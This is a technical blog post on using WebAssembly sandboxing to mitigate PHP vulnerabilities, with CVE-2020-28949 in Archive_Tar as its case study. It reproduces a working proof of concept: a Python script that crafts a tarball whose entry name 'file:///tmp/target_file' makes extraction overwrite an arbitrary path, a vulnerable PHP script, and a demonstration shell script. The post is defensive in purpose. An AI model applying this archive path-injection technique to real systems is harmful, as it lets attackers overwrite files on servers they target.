Mitigating PHP Vulnerabilities with WebAssembly
PHP is one of the most popular server-side web programming languages and is used to build from simple blogs to large-scale systems. However, like any other software platform, PHP is not immune to vulnerabilities that can be exploited by malicious attackers.
In this article, we will explore how certain vulnerabilities can be mitigated by using WebAssembly (Wasm). The PHP interpreter is compiled to Wasm, and the Wasm runtime provides sandboxing capabilities, including limiting file system access in various ways. We will use a vulnerability found in the Archive_Tar library as an easy-to-exploit example.
By using Archive_Tar as a case study, we will learn how WebAssembly can provide an additional security layer that protects against different kinds of vulnerabilities, including those that may not be public but can be prevented by these mechanisms. This does not only apply to PHP but also to other programming languages. It goes without saying, but the purpose of this article is not to criticize PHP or any of the other projects mentioned, but rather how Wasm can help protect existing applications without requiring major (or any) changes.
TL;DR:
Follow the steps below to check out the exploit for the original vulnerability and how WebAssembly can mitigate it:
- Clone the repository and generate a Docker testing image:
git clone https://github.com/vmware-labs/mod_wasm.git &&
cd mod_wasm/examples/exploit-examples/Archive_Tar &&
./run.sh
- Run the exploit:
- Original exploit:
./steps.sh
- Under WebAssembly:
./wasm_steps.sh
- Original exploit:
Archive_Tar's Vulnerability
Archive_Tar is a popular PHP library that allows the creation, extraction and manipulation of .tar
files. It is used in many well-known web applications such as Drupal, a CMS that powers popular sites like the European Union, NASA and Tesla. The Drupal Security Team has published different security advisories regarding Archive_Tar. In this article, we will focus on the SA-CORE-2020-013 advisory, and more specifically on its associated vulnerability CVE-2020-28949.
This critical vulnerability identifies a flaw in the filename sanitization algorithm. It describes how a malicious attacker could prefix filenames with file://
inside the .tar
archive to trick the library to overwriting unintended files upon extraction. This vulnerability is classified as an "injection" in the software security jargon, a kind ranked #3 in the latest OWASP-10 report. It is due to improper neutralization or lack of verification, as explained in more detail in CWE-74.
Exploiting the Vulnerability
For our case study, this vulnerability is very easy to exploit, and a demonstration script is available in the Archive_Tar repository. The exploit example basically generates a tarball archive (exploit.tar
) adding a file whose name starts with file://
, followed by the path under attack (e.g.: file:///etc/passwd
). Then, when a PHP script invokes Archive_Tar to extract the tarball (vulnerable.php
), it will overwrite the target path.
To craft the malicious tarball archive, the exploit makes use of a Python script which facilitates the handling of the fake file names. After creating the archive, it invokes the tar.add()
method to include the file specified in the first parameter (input_file.txt
). The second parameter (file:///tmp/target_file
) is known as the alternative name that will be used for extraction, and it represents the path under attack. Here is where the extraction algorithm lacks proper verification.
#!/usr/bin/python
import tarfile
tar = tarfile.open('exploit.tar', 'w')
tar.add('input_file.txt', 'file:///tmp/target_file')
tar.close()
We can inspect the resulting tarball archive by executing tar –tvf exploit.tar
, and check how the target filename is set.
gzurl@dev:/exploit/file_poc$ tar -tvf exploit.tar
-rw-rw-r-- root/root 9 2020-11-14 08:19 file:///tmp/target_file
The vulnerable.php
script is straightforward; it includes the vulnerable version of Archive_Tar, opens the malicious tarball archive and extracts it, overwriting the original /tmp/target_file
with the contents of input_file.txt
.
<?php
require_once('../Archive/Tar.php');
$archive = new Archive_Tar('exploit.tar');
$archive->extract();
The exploit provides a steps.sh
script for convenience that performs these steps in sequence, including checks before and after the vulnerable.php
script is invoked, plus some clean up at the end.
#!/bin/sh
# Create a dummy file that we aim to alter
echo "test" > /tmp/target_file
# Check the contents of the file (will say 'test')
echo "cat /tmp/target_file => `cat /tmp/target_file`"
# Create our tar archive with filename specified as file:///tmp/target_file
python create_tar.py
# Call the vulnerable script that uses Archive_Tar
php vulnerable.php
# Confirm that the contents of the dummy file created above
# have been overwritten (will say 'whatever')
echo "cat /tmp/target_file => `cat /tmp/target_file`"
# Cleanup
rm exploit.tar /tmp/target_file
The result of executing the exploit under a vulnerable PHP environment displays the original contents of the target path /tmp/target_file
, followed by the exploit execution, and finally it shows the contents again for verification. Different contents indicate that the exploit was successful.
gzurl@dev:/exploit/file_poc$ ./steps.sh
cat /tmp/target_file => test
cat /tmp/target_file => whatever
Sandboxing PHP with WebAssembly
WebAssembly provides a unique capability by sandboxing binary files and executing them at near-native speed. Its capabilities-based security model follows a deny-by-default approach, meaning no access to the outside world (file system, network, etc.) is allowed unless it is explicitly authorized. Let’s see how WebAssembly can be used to run the same vulnerable PHP script in a secure environment.
PHP is a scripting language whose interpreter is written in C. Thus, running PHP in WebAssembly means porting its interpreter into a Wasm binary. There are some challenges to this process, such as dealing with some missing features in WebAssembly (threads, signals, setjmp/longjmp
, mmap
, etc.). Code using these functionalities needs to be disabled or patched.
To overcome these challenges, the WebAssembly Language Runtimes project provides pre-compiled builds of popular language runtimes and third-party libraries ported to Wasm. These runtimes and libraries have been patched, tested for compatibility, and kept up to date. At the time of writing, the latest PHP Wasm build offered is 8.2.0. Here is an example of running the php-cgi --version
command using Wasmtime as the WebAssembly runtime:
gzurl@dev:/exploit/file_poc$ wasmtime php-cgi-8.2.0-slim.wasm -- --version
PHP 8.2.0 (cgi-fcgi) (built: Apr 18 2023 10:20:36)
Copyright (c) The PHP Group
Zend Engine v4.2.0, Copyright (c) Zend Technologies
In a real-world scenario, the PHP Wasm binary could be used as part of a traditional LAMP stack, using an extension like mod_wasm which allows the Apache server to run WebAssembly binaries. It could also be used in a framework to build serverless applications such as Wasm Workers Server. For our purpose, we will just create a wasm_steps.sh
script based on the original steps.sh
from the exploit, only modifying the PHP invocation to use the Wasmtime CLI instead:
# Call the vulnerable script that uses Archive_Tar
wasmtime --mapdir /::$PWD --dir /usr/share/php php-cgi-8.2.0-slim.wasm -- -f vulnerable.php
As previously mentioned, WebAssembly provides a deny-by-default security model, so we need to explicitly provide access to concrete paths in the filesystem:
--mapdir /::$PWD
: This parameter maps the current working directory ($PWD
) into the WebAssembly binary’s root directory to access the tarball archive for extraction. The rest of the filesystem gets totally hidden and unreachable.--dir /usr/share/php
: Since the library scriptTar.php
requires access to some other common scripts (ie:PEAR.php
), we also authorize its reachability.-- -f vulnerable.php
: After the double dash, all parameters are passed directly to the WebAssembly binary. In this case,-f
indicates that we are providing the input file and requesting quiet-mode to suppress the HTTP header output.
Finally, when we execute the exploit under the WebAssembly sandboxing model, the contents of the target file are not modified, and the exploit is unsuccessful. Yay!
gzurl@dev:/exploit/file_poc$ ./wasm_steps.sh
cat /tmp/target_file => test
cat /tmp/target_file => test
Conclusion
We have shown how WebAssembly can provide an additional security layer to protect existing software from different kinds of vulnerabilities, using a known and easy-to-exploit vulnerability from a popular PHP package.
The WebAssembly deny-by-default security model also provides developers and sysadmins with the ability to set more secure access policies to resources, potentially enabling dynamic policies per user and per request on a production system. This represents a step forward in security for traditional web applications, where resources reachability is usually set statically and often relies on the operating system configuration.
While WebAssembly can be a powerful tool in mitigating many types of vulnerabilities, it is important to note that it cannot protect against all types of attacks, such as cryptographic failures (OWASP #2), logic, authentication or authorization issues.
Finally, the WebAssembly capabilities demonstrated in this article are not limited to PHP. Any programming language suitable to be compiled or interpreted to run as a Wasm binary could benefit from this technology. As more languages add WebAssembly support, we can expect to see even more applications and use cases leveraging its unique security features.